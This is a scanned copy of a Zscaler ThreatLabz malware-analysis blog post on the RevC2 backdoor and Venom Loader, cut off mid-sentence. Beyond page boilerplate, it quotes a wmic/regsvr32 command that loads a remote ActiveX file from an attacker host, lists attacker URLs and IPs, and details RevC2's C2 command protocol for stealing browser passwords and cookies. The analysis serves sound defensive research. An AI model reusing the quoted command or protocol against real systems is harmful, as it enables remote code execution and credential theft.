www.zscaler.com
Open in
urlscan Pro
2606:4700:4400::ac40:99eb
Public Scan
URL:
https://www.zscaler.com/blogs/security-research/unveiling-revc2-and-venom-loader
Submission: On December 04 via api from IN — Scanned from DK
Submission: On December 04 via api from IN — Scanned from DK
Form analysis 6 forms found in the DOM
<form class="mb-[3rem] pt-[4.8rem] md:mb-[4.2rem] md:pt-[3rem]">
<div class="relative"><input placeholder="What are you looking for?" aria-label="job-search-input" class="
border-0
focus:ring-0
w-full
font-normal
text-[2rem]
leading-10
-tracking-[0.01rem]
py-[1.3rem]
pr-[3rem]
bg-[transparent]
focus:outline-none
md:text-[3.2rem]
md:leading-[3.5rem]
border-b-[0.3rem]
autofill:shadow-[0 0 0px 1000px transparent inset]
autofill:transition-[background-color]
autofill:duration-[5000s]
autofill:ease-in-out
text-darkBlue border-b-pink autofill:text-darkBlue" value=""></div>
</form><form class="mb-[3rem] pt-[4.8rem] md:mb-[4.2rem] md:pt-[3rem]">
<div class="relative"><input placeholder="What are you looking for?" aria-label="job-search-input" class="
border-0
focus:ring-0
w-full
font-normal
text-[2rem]
leading-10
-tracking-[0.01rem]
py-[1.3rem]
pr-[3rem]
bg-[transparent]
focus:outline-none
md:text-[3.2rem]
md:leading-[3.5rem]
border-b-[0.3rem]
autofill:shadow-[0 0 0px 1000px transparent inset]
autofill:transition-[background-color]
autofill:duration-[5000s]
autofill:ease-in-out
text-darkBlue border-b-pink autofill:text-darkBlue" value=""></div>
</form><form class="marketoForm_root__Wkgni marketoForm_variant_cta_module__IwKzs mktoForm mktoHasWidth mktoLayoutLeft" id="mktoForm_7971"
style="opacity: 100; font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); width: 1601px;" novalidate="novalidate">
<style type="text/css">
.mktoForm .mktoButtonWrap.mktoRound .mktoButton {
color: #fff;
border: 1px solid #a3bee2;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
background-color: #779dd5;
background-image: -webkit-gradient(linear, left top, left bottom, from(#779dd5), to(#5186cb));
background-image: -webkit-linear-gradient(top, #779dd5, #5186cb);
background-image: -moz-linear-gradient(top, #779dd5, #5186cb);
background-image: linear-gradient(to bottom, #779dd5, #5186cb);
padding: 0.4em 1em;
font-size: 1em;
}
.mktoForm .mktoButtonWrap.mktoRound .mktoButton:hover {
border: 1px solid #45638c;
}
.mktoForm .mktoButtonWrap.mktoRound .mktoButton:focus {
outline: none;
border: 1px solid #45638c;
}
.mktoForm .mktoButtonWrap.mktoRound .mktoButton:active {
background-color: #5186cb;
background-image: -webkit-gradient(linear, left top, left bottom, from(#5186cb), to(#779dd5));
background-image: -webkit-linear-gradient(top, #5186cb, #779dd5);
background-image: -moz-linear-gradient(top, #5186cb, #779dd5);
background-image: linear-gradient(to bottom, #5186cb, #779dd5);
}
</style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email_7971" id="LblEmail_7971" class="mktoLabel mktoHasWidth" style="width: 0px;">
<div class="mktoAsterix">*</div>
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="Email_7971" name="Email" placeholder="Email Address" maxlength="255" aria-labelledby="LblEmail_7971 InstructEmail_7971" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 250px;" aria-label="Enter email"><span id="InstructEmail_7971" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="subBlog" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Single_OptIn_IP_Address__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Campaign_Type__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Campaign_Theme__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="newFirstName" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Google_Click_Id__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Campaign_Medium__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Campaign_Source__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Campaign_Name__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoRound" style="margin-left: 120px;"><button type="submit" class="mktoButton">Subscribe</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="7971" placeholder=""><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="306-ZEJ-256" placeholder=""><input type="hidden" name="LeadSource" class="mktoField mktoFieldDescriptor" value="Website Direct"
placeholder=""><input type="hidden" name="Lead_Source_Type__c" class="mktoField mktoFieldDescriptor" value="Website" placeholder=""><input type="hidden" name="Lead_Source_Detail__c" class="mktoField mktoFieldDescriptor" value=""
placeholder=""><input type="hidden" name="Lead_Source_Recent__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input type="hidden" name="Campaign_Content__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input
type="hidden" name="Campaign_ID__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input type="hidden" name="Campaign_Term__c" class="mktoField mktoFieldDescriptor" value="" placeholder="">
</form><form class="marketoForm_root__Wkgni marketoForm_variant_footer__jwLCq mktoForm mktoHasWidth mktoLayoutLeft" id="mktoForm_1944" style="opacity: 100; font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); width: 1601px;"
novalidate="novalidate">
<style type="text/css">
.mktoForm .mktoButtonWrap.mktoRound .mktoButton {
color: #fff;
border: 1px solid #a3bee2;
-webkit-border-radius: 5px;
-moz-border-radius: 5px;
border-radius: 5px;
background-color: #779dd5;
background-image: -webkit-gradient(linear, left top, left bottom, from(#779dd5), to(#5186cb));
background-image: -webkit-linear-gradient(top, #779dd5, #5186cb);
background-image: -moz-linear-gradient(top, #779dd5, #5186cb);
background-image: linear-gradient(to bottom, #779dd5, #5186cb);
padding: 0.4em 1em;
font-size: 1em;
}
.mktoForm .mktoButtonWrap.mktoRound .mktoButton:hover {
border: 1px solid #45638c;
}
.mktoForm .mktoButtonWrap.mktoRound .mktoButton:focus {
outline: none;
border: 1px solid #45638c;
}
.mktoForm .mktoButtonWrap.mktoRound .mktoButton:active {
background-color: #5186cb;
background-image: -webkit-gradient(linear, left top, left bottom, from(#5186cb), to(#779dd5));
background-image: -webkit-linear-gradient(top, #5186cb, #779dd5);
background-image: -moz-linear-gradient(top, #5186cb, #779dd5);
background-image: linear-gradient(to bottom, #5186cb, #779dd5);
}
</style>
<div class="mktoFormRow">
<div class="mktoFieldDescriptor mktoFormCol" style="margin-bottom: 10px;">
<div class="mktoOffset" style="width: 10px;"></div>
<div class="mktoFieldWrap mktoRequiredField"><label for="Email_1944" id="LblEmail_1944" class="mktoLabel mktoHasWidth" style="width: 0px;">
<div class="mktoAsterix">*</div>
</label>
<div class="mktoGutter mktoHasWidth" style="width: 10px;"></div><input id="Email_1944" name="Email" placeholder="Please enter your email to subscribe" maxlength="255" aria-labelledby="LblEmail_1944 InstructEmail_1944" type="email"
class="mktoField mktoEmailField mktoHasWidth mktoRequired" aria-required="true" style="width: 250px;" aria-label="Enter email"><span id="InstructEmail_1944" tabindex="-1" class="mktoInstruction"></span>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="subBlog" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Single_OptIn_IP_Address__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Campaign_Type__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Campaign_Theme__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="newFirstName" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Google_Click_Id__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Campaign_Medium__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Campaign_Source__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoFormRow"><input type="hidden" name="Campaign_Name__c" class="mktoField mktoFieldDescriptor mktoFormCol" value="" placeholder="" style="margin-bottom: 10px;">
<div class="mktoClear"></div>
</div>
<div class="mktoButtonRow"><span class="mktoButtonWrap mktoRound" style="margin-left: 120px;"><button type="submit" class="mktoButton">Subscribe</button></span></div><input type="hidden" name="formid" class="mktoField mktoFieldDescriptor"
value="1944" placeholder=""><input type="hidden" name="munchkinId" class="mktoField mktoFieldDescriptor" value="306-ZEJ-256" placeholder=""><input type="hidden" name="LeadSource" class="mktoField mktoFieldDescriptor" value="Website Direct"
placeholder=""><input type="hidden" name="Lead_Source_Type__c" class="mktoField mktoFieldDescriptor" value="Website" placeholder=""><input type="hidden" name="Lead_Source_Detail__c" class="mktoField mktoFieldDescriptor" value=""
placeholder=""><input type="hidden" name="Lead_Source_Recent__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input type="hidden" name="Campaign_Content__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input
type="hidden" name="Campaign_ID__c" class="mktoField mktoFieldDescriptor" value="" placeholder=""><input type="hidden" name="Campaign_Term__c" class="mktoField mktoFieldDescriptor" value="" placeholder="">
</form><form class="marketoForm_root__Wkgni marketoForm_variant_footer__jwLCq mktoForm mktoHasWidth mktoLayoutLeft"
style="opacity: 0; font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;" novalidate="novalidate"></form><form class="marketoForm_root__Wkgni marketoForm_variant_cta_module__IwKzs mktoForm mktoHasWidth mktoLayoutLeft"
style="opacity: 0; font-family: Helvetica, Arial, sans-serif; font-size: 13px; color: rgb(51, 51, 51); visibility: hidden; position: absolute; top: -500px; left: -1000px; width: 1600px;" novalidate="novalidate"></form>Text Content
___
This site uses JavaScript to provide a number of functions, to use this site
please enable JavaScript in your browser.
OpenSearch
ThreatLabz
CXO REvolutionaries
Careers
Partners
Support
ShowContact Us
Get in touch
1-408-533-0288
Chat with us
ShowSign In
Zscaler Cloud Portal | Admin
Zscaler Cloud Portal One | Admin
Zscaler Cloud Portal Two | Admin
Zscaler Cloud Portal Three | Admin
Zscaler Cloud Portal Beta | Admin
admin.zscloud.net
Zscaler Private Access Cloud Portal One | Admin
Zscaler Private Access Cloud Portal Two | Admin
Home
Platform
Products
Solutions
Resources
Company
Request a demo
Secure the Workforce
Provide users with seamless, secure, reliable access to applications and data.
Secure the Cloud
Build and run secure cloud apps, enable zero trust cloud connectivity, and
protect workloads from data center to cloud.
Secure IoT/OT
Provide zero trust connectivity for IoT and OT devices and secure remote access
to OT systems.
Secure B2B
Provide zero trust site-to-site connectivity and reliable access to B2B apps for
partners.
Why Zscaler
Leadership in AI/ML
Zscaler SASE
Zscaler SSE
Analyst Recognition
Customer Stories
Partner Ecosystem
Reduce Your Carbon Footprint
GARTNER REPORT
Zscaler: A Leader in the 2024 Gartner® Magic Quadrant™ for Security Service Edge
(SSE)
Get the report
Cyberthreat Protection
Secure Internet Access (ZIA)
Secure Private Access (ZPA)
Zero Trust Firewall
Sandbox
Browser Isolation
Data Protection
Web and Email DLP
Multi-Mode CASB
Endpoint DLP
Unified SaaS Security
Gen AI Security
DSPM
BYOD Security
Zero Trust Networking
Zero Trust SD-WAN
Zero Trust Device Segmentation
Zero Trust Cloud
Zero Trust for IoT/OT
Digital Experience (ZDX)
Zero Trust SASE
Risk Management
Powered by the Data Fabric for Security
Risk360
Unified Vulnerability Management
Deception
Breach Predictor
Identity Protection
Managed Threat Hunting
Business Insights
USE CASES
Replace VPN
Stop Ransomware
VDI Alternative
Secure Your Data
Optimize Digital Experiences
Deploy Zero Trust SASE
Deploy BYOD Securely
Reduce Cyber Risk
Right-Size SaaS & Office Space Footprint
Accelerate M&A and Divestitures
INDUSTRY & MARKET SOLUTIONS
Healthcare
Banking & Financial Services
US Public Sector
US Federal Government
US State & Local Government
Education
Australia Government
China Government
PARTNERS
Explore Our Partners
Become a Partner
Partner Portal
TECHNOLOGY PARTNERS
Explore Technology Partners
Microsoft
CrowdStrike
AWS
Okta
Rubrik
SAP
USE CASES
Replace VPN
Stop Ransomware
VDI Alternative
Secure Your Data
Optimize Digital Experiences
Deploy Zero Trust SASE
Deploy BYOD Securely
Reduce Cyber Risk
Right-Size SaaS & Office Space Footprint
Accelerate M&A and Divestitures
INDUSTRY & MARKET SOLUTIONS
Healthcare
Banking & Financial Services
US Public Sector
US Federal Government
US State & Local Government
Education
Australia Government
China Government
PARTNERS
Explore Our Partners
Become a Partner
Partner Portal
TECHNOLOGY PARTNERS
Explore Technology Partners
Microsoft
CrowdStrike
AWS
Okta
Rubrik
SAP
Resource Center
Resource Library
Blog
Customer Success Stories
Webinars
Zpedia
Events & Trainings
Upcoming Events
Zenith Live
Zscaler Academy
Security Research & Services
ThreatLabz Analytics
Security Advisory Updates
Zero Trust Resources
Tools
Security Preview
Security and Risk Assessment
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator
Community & Support
Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Visit now
Resource Center
Resource Library
Blog
Customer Success Stories
Webinars
Zpedia
Events & Trainings
Upcoming Events
Zenith Live
Zscaler Academy
Security Research & Services
ThreatLabz Analytics
Security Advisory Updates
Zero Trust Resources
Tools
Security Preview
Security and Risk Assessment
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator
Community & Support
Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
About Zscaler
Discover how it began and where it’s going
Partners
Meet our partners and explore system integrators and technology alliances
News & Announcements
Stay up to date with the latest news
Leadership Team
Meet our management team
Partner Integrations
Explore our technology partner integrations
Investor Relations
See news, stock information, and quarterly reports
Corporate Responsibility
Learn about our approach
Careers
Join our mission
Press Center
Find everything you need to cover Zscaler
Compliance
Understand our adherence to rigorous standards
Zenith Ventures
Learn about our strategic startup investments
Home
Request a demo
Platform
Products
Solutions
Resources
Company
Request a demo
ThreatLabzCXO REvolutionariesCareersPartnersSupport
ShowContact Us
Get in touch1-408-533-0288Chat with us
ShowSign In
Zscaler Cloud Portal | AdminZscaler Cloud Portal One | AdminZscaler Cloud Portal
Two | AdminZscaler Cloud Portal Three | AdminZscaler Cloud Portal Beta |
Adminadmin.zscloud.netZscaler Private Access Cloud Portal One | AdminZscaler
Private Access Cloud Portal Two | Admin
Platform
Secure the Workforce
Provide users with seamless, secure, reliable access to applications and data.
Secure the Cloud
Build and run secure cloud apps, enable zero trust cloud connectivity, and
protect workloads from data center to cloud.
Secure IoT/OT
Provide zero trust connectivity for IoT and OT devices and secure remote access
to OT systems.
Secure B2B
Provide zero trust site-to-site connectivity and reliable access to B2B apps for
partners.
Why Zscaler
Leadership in AI/ML
Zscaler SASE
Zscaler SSE
Analyst Recognition
Customer Stories
Partner Ecosystem
Reduce Your Carbon Footprint
GARTNER REPORT
Zscaler: A Leader in the 2024 Gartner® Magic Quadrant™ for Security Service Edge
(SSE)
Get the report
Products
Cyberthreat Protection
Secure Internet Access (ZIA)
Secure Private Access (ZPA)
Zero Trust Firewall
Sandbox
Browser Isolation
Data Protection
Web and Email DLP
Multi-Mode CASB
Endpoint DLP
Unified SaaS Security
Gen AI Security
DSPM
BYOD Security
Zero Trust Networking
Zero Trust SD-WAN
Zero Trust Device Segmentation
Zero Trust Cloud
Zero Trust for IoT/OT
Digital Experience (ZDX)
Zero Trust SASE
Risk Management
Powered by the Data Fabric for Security
Risk360
Unified Vulnerability Management
Deception
Breach Predictor
Identity Protection
Managed Threat Hunting
Business Insights
Solutions
USE CASES
Replace VPN
Stop Ransomware
VDI Alternative
Secure Your Data
Optimize Digital Experiences
Deploy Zero Trust SASE
Deploy BYOD Securely
Reduce Cyber Risk
Right-Size SaaS & Office Space Footprint
Accelerate M&A and Divestitures
INDUSTRY & MARKET SOLUTIONS
Healthcare
Banking & Financial Services
US Public Sector
US Federal Government
US State & Local Government
Education
Australia Government
China Government
PARTNERS
Explore Our Partners
Become a Partner
Partner Portal
TECHNOLOGY PARTNERS
Explore Technology Partners
Microsoft
CrowdStrike
AWS
Okta
Rubrik
SAP
USE CASES
Replace VPN
Stop Ransomware
VDI Alternative
Secure Your Data
Optimize Digital Experiences
Deploy Zero Trust SASE
Deploy BYOD Securely
Reduce Cyber Risk
Right-Size SaaS & Office Space Footprint
Accelerate M&A and Divestitures
INDUSTRY & MARKET SOLUTIONS
Healthcare
Banking & Financial Services
US Public Sector
US Federal Government
US State & Local Government
Education
Australia Government
China Government
PARTNERS
Explore Our Partners
Become a Partner
Partner Portal
TECHNOLOGY PARTNERS
Explore Technology Partners
Microsoft
CrowdStrike
AWS
Okta
Rubrik
SAP
Resources
Resource Center
Resource Library
Blog
Customer Success Stories
Webinars
Zpedia
Events & Trainings
Upcoming Events
Zenith Live
Zscaler Academy
Security Research & Services
ThreatLabz Analytics
Security Advisory Updates
Zero Trust Resources
Tools
Security Preview
Security and Risk Assessment
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator
Community & Support
Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Visit now
Resource Center
Resource Library
Blog
Customer Success Stories
Webinars
Zpedia
Events & Trainings
Upcoming Events
Zenith Live
Zscaler Academy
Security Research & Services
ThreatLabz Analytics
Security Advisory Updates
Zero Trust Resources
Tools
Security Preview
Security and Risk Assessment
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator
Community & Support
Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
Company
About Zscaler
Discover how it began and where it’s going
Partners
Meet our partners and explore system integrators and technology alliances
News & Announcements
Stay up to date with the latest news
Leadership Team
Meet our management team
Partner Integrations
Explore our technology partner integrations
Investor Relations
See news, stock information, and quarterly reports
Corporate Responsibility
Learn about our approach
Careers
Join our mission
Press Center
Find everything you need to cover Zscaler
Compliance
Understand our adherence to rigorous standards
Zenith Ventures
Learn about our strategic startup investments
Zscaler Blog
Get the latest Zscaler blog updates in your inbox
Subscribe
Security Research
UNVEILING REVC2 AND VENOM LOADER
MUHAMMED IRFAN V A - Security Researcher II
December 02, 2024 - 12 min read
Threatlabz Research
Contents
1. Introduction
2. Key Takeaways
3. Technical Analysis
4. Conclusion
5. Zscaler Coverage
6. Indicators Of Compromise (IOCs)
7. MITRE ATT&CK Techniques
8. Appendix
9. More blogs
Copy URL
Copy URL
INTRODUCTION
Venom Spider, also known as GOLDEN CHICKENS, is a threat actor known for
offering Malware-as-a-Service (MaaS) tools like VenomLNK, TerraLoader,
TerraStealer, and TerraCryptor. These tools have been utilized by other threat
groups such as FIN6 and Cobalt in the past. Recently, Zscaler ThreatLabz
uncovered two significant campaigns leveraging Venom Spider's MaaS tools between
August and October 2024. During our investigation, we identified two new malware
families, which we named RevC2 and Venom Loader, that were deployed using Venom
Spider MaaS Tools.
In this blog, we dissect the attack chain used in these campaigns and provide a
comprehensive analysis of these new malware families. We delve into their core
features, network communication protocols, and commands.
KEY TAKEAWAYS
* Between August and October 2024, ThreatLabz uncovered campaigns that
leveraged two new malware families – RevC2 and Venom Loader.
* These two new malware families were deployed through Venom Spider
malware-as-service (MaaS) tools.
* RevC2 uses WebSockets to communicate with its command-and-control (C2)
server. The malware is capable of stealing cookies and passwords, proxies
network traffic, and enables remote code execution (RCE).
* Venom Loader is a new malware loader that is customized for each victim,
using the victim’s computer name to encode the payload.
TECHNICAL ANALYSIS
The following sections are a technical analysis of the campaigns. The URLs and
file names used in these campaigns vary with each sample. We analyzed a
representative sample from each campaign.
CAMPAIGN 1: API DOCUMENTATION LURE LEADS TO REVC2
The first campaign, occurring from August to September, uses an API
documentation lure to deliver a malicious payload, RevC2. RevC2 is a backdoor
with capabilities to steal sensitive data.
The figure below illustrates the attack chain that leads to the delivery of
RevC2.
Figure 1: Attack chain of the first campaign delivering RevC2 as the payload.
FIRST STAGE: VENOMLNK
Although the distribution method is currently unknown, the first stage of the
attack begins with a VenomLNK file. This LNK file contains an obfuscated batch
(BAT) script that when executed downloads a PNG image
from hxxp://gdrive[.]rest:8080/api/API.png. The PNG image is an API
documentation lure, as shown in the figure below.
Figure 2: API documentation lure used in the first campaign that leverages the
RevC2.
The VenomLNK file executes the following command in the background to register
an ActiveX control, triggering the execution of RevC2:
wmic process call create "regsvr32 /s /i \\gdrive.rest@8080\api\AdvancedWin.ocx"
SECOND STAGE: REVC2
The second stage features RevC2, named after the Program Database (PDB) path
observed in the binary:
C:\Users\PC\Desktop\C2New\Rev\x64\Release\Rev.pdb
Upon execution, RevC2 retrieves the command-line and checks whether the first
argument ends with dWin.ocx, matching the suffix of the filename. RevC2 then
retrieves the path of the executable file for the current process and compares
it to regsvr32.exe. The malicious software only executes if both checks pass,
ensuring RevC2 is launched as part of the attack chain and not in analysis
environments such as sandboxes.
RevC2 then retrieves the operating system’s local time and creates a log file in
the format C:\ProgramData\boot_%YYYYMMDDTHHMMSS%.log. The log file stores
internal messages generated by the malware during its execution.
An example of the log created by RevC2 is shown below:
[2024-11-14 17:21:38.530681]: Multipler : 1
[2024-11-14 17:22:01.546498]: Getting Passwords
REVC2 COMMUNICATION PROTOCOL
RevC2 uses WebSockets for C2 communication with the help of a C++
library, websocketpp. The C2 address is hardcoded in the binary. In the sample
we examined, the address was ws://208.85.17[.]52:8082.
All data exchanged between the victim’s machine and the C2 server are JSON
objects.
* Victim’s machine to C2 server: This JSON object includes two properties:
1. The output being sent.
2. The command_ID type of the output.
The format of this JSON object is:
{"%output_name%": "%output_value%","type":"%command_ID%"}
* C2 server to victim’s machine: This JSON object includes two properties:
1. type: Contains a command_ID that tells the malware what actions to
perform.
2. command: Contains the command_parameter related to the action to be
performed. In some cases, the command property is empty.
The format of this JSON object is:
{"type":"%command_ID%","command":"%command_parameter%"}
The command_ID sent by RevC2 to the C2 server is not always the same as
the command_ID sent by the C2 server to RevC2. In two cases (when executing
shell commands and taking screenshots) the command_ID is different, as shown in
Table 1 and Table 2.
CLIENT REGISTRATION
The first data sent to the server is related to registration. The data is a JSON
object in the format {"name": "%computername%","type":"0005"}.
The figure below shows example network traffic between the victim’s machine and
the C2 server.
Figure 3: Example network traffic between a system infected with RevC2 and the
C2 server.
COMMANDS SUPPORTED
RevC2 registers a function handler, which processes the command_ID
and command_parameter from the C2 server and performs the appropriate actions.
The command_ID’s supported by RevC2 are described in the table below.
Action
command_ID
command_parameter
Description
Steals passwords
000000
Empty
Steals passwords from Chromium browsers.
RevC2 starts with writing an entry to the log file with the message “Getting
Passwords”. Then, RevC2 retrieves saved passwords from Chromium browsers and
sends them to the C2 server.
Executes shell commands
0001
%command%
Executes shell commands.
The command_parameter contains the command to be executed. A new thread is
created to execute the command. The %command% is appended with cmd /c and this
command-line is used to create a new process. A pipe is created and the standard
output and error of the process is redirected to this pipe. The output is read
from the pipe and sent to the C2 server.
Takes screenshots
0002
%mutipler%
Takes screenshots of the victim’s system.
The command_parameter sent is used as the multiplier. The width and height of
the desktop’s screen in pixels is multiplied with this value to configure the
resolution of the screenshot. The activity is added to the log file in the
format: [%TimeStamp%]:Multipler : %mutipler%. A screenshot of the victim’s
desktop is taken, base64-encoded, and sent to the C2 server.
Proxies traffic
0003
{"listenerIP": "%ip%", "listenerPort" : "%port%"}
Proxies network data using the SOCKS5 protocol.
RevC2 receives data to proxy by the C2 server in the command_parameter. There
are two internal command IDs that RevC2 uses:
* 0x55 - Connects to a target address and proxies data to the proxy server.
* 0x70 - Sends data to the connected socket (created by using the command ID
0x55) from the proxy server.
Steals cookies
0009
Empty
Steals cookies from Chromium browsers.
RevC2 starts with writing an entry to the log file with the message “Getting
Cookies”. This ID also logs details related to stealing cookies in the log file.
Then, RevC2 retrieves saved cookies from Chromium browsers and sends them to the
C2 server.
Executes a command as a different user
0012
{"username": "%username%","password": "%password%","command": "%commandline%"}
Executes a command as a different user using the credentials received.
The %commandline% can be a file path or a command. RevC2 does not send the
command's output to the C2 server.
Table 1: Description of the commands supported by RevC2.
The data format for each RevC2 command_ID is listed in the table below.
Action
command_ID
Data Format
Steals passwords
000000
{"passwords":"Application: %application%
Website: %website%
Login URL: %url%
User name: %username%
Password: %password%
","type":"000000"}.
Executes shell commands
0007
{"result":"%output_of_command%”, "type":"0007"}
Takes screenshots
0006
{"image":"%base64encoded_image%”, "type":"0006"}
Proxies traffic
0003
N/A
Steals cookies
0009
{"cookies":"[
{
"Application":"%application%",
"domain": "%domain%",
"expirationDate": %exp_Date%,
"httpOnly": %http_only%,
"name": "%cookie_name%",
"path": "%path%",
"sameSite": "%samesite%",
"Secure": %secure%,
"url": "%url%",
"value": "%cookie_value%"
}
]", "type": "0009"}
Executes a process as a different user
0012
N/A
Table 2: Data format for the command_ID’s supported by RevC2.
ThreatLabz created a Python script that emulates a RevC2 server. The script is
available in our GitHub repository. The figure below shows example output of an
emulated RevC2 server.
Figure 4: Python script emulating the RevC2 server.
CAMPAIGN 2: CRYPTO TRANSACTION LURE LEADS TO VENOM LOADER AND MORE_EGGS LITE
MALWARE
The second campaign, occurring from September to October, appears to be using a
cryptocurrency transaction lure to deliver Venom Loader. Venom Loader then
loads More_eggs lite, a JavaScript (JS) backdoor providing remote code execution
(RCE) capabilities to the threat actor.
More_eggs is a JS-based backdoor delivered using VenomLNK. We named this variant
“More_eggs lite” because, although it is a JS backdoor delivered via VenomLNK,
the variant only includes the capability to perform remote code execution
(RCE).
The figure below illustrates the attack chain for the second campaign
delivering More_eggs lite.
Figure 5: Attack chain of the second campaign delivering More_eggs lite as the
payload.
FIRST STAGE: VENOMLNK
Although the method of distribution is currently unknown, the first stage of the
attack begins with a VenomLNK file. The LNK file contains an obfuscated BAT
script which writes a Visual Basic Script (VBS) script (run_bat.vbs) and a BAT
script (bat2.bat) to the Windows temporary directory. VenomLNK first
executes run_bat.vbs, which is used to execute bat2.bat. The bat2.bat file
downloads an image of a cryptocurrency transaction as a lure and displays the
image to the victim, as shown in the figure below.
Figure 6: Cryptocurrency transaction lure used in the second campaign that
leverages Venom Spider tools.
In the background, the malware downloads base.zip
from hxxp://170.75.168[.]151/%computername%/aaa.
The BAT file then unzips base.zip, which contains ApplicationFrameHost.exe. From
here, the BAT file executes ApplicationFrameHost.exe which sideloads a malicious
DLL named dxgi.dll, leading to the execution of Venom Loader.
SECOND STAGE: VENOM LOADER
The Venom Loader DLL used in this campaign is custom built for each victim and
is used to load the next stage. As mentioned before, base.zip, which contains
Venom Loader, is downloaded from hxxp://170.75.168[.]151/%computername%/aaa.
The %computername% value is an environment variable which contains the computer
name of the system. Venom Loader uses %computername% as the hardcoded XOR key to
encode the following stages.
In this instance, Venom Loader is used to load the More_eggs lite
backdoor. More_eggs lite’s content is stored as plain text in Venom Loader. The
content is XOR’ed with the %computername% and base64-encoded. The result of this
is split into three chunks and written to disk with the file names text1, text2,
and text3.
After this, Venom Loader writes a PowerShell (PS) script
to %APPDATA%\Adobe\merge.ps1, which is used to decode the chunks stored
in text1, text2, and text3, and write it to %LOCALAPPDATA%\Microsoft\hello.js.
Then hello.js is executed using cscript.
Next, Venom Loader creates a VBS script named run_all.vbs in the %APPDATA%\Adobe
directory. This script is designed to execute commands passed to it as
command-line arguments. Then, run_all.vbs is used to run merge.ps1 leading to
execution of More_eggs lite. Finally, Venom Loader establishes persistence for
the More_eggs lite backdoor by adding merge.ps1 to the autorun registry
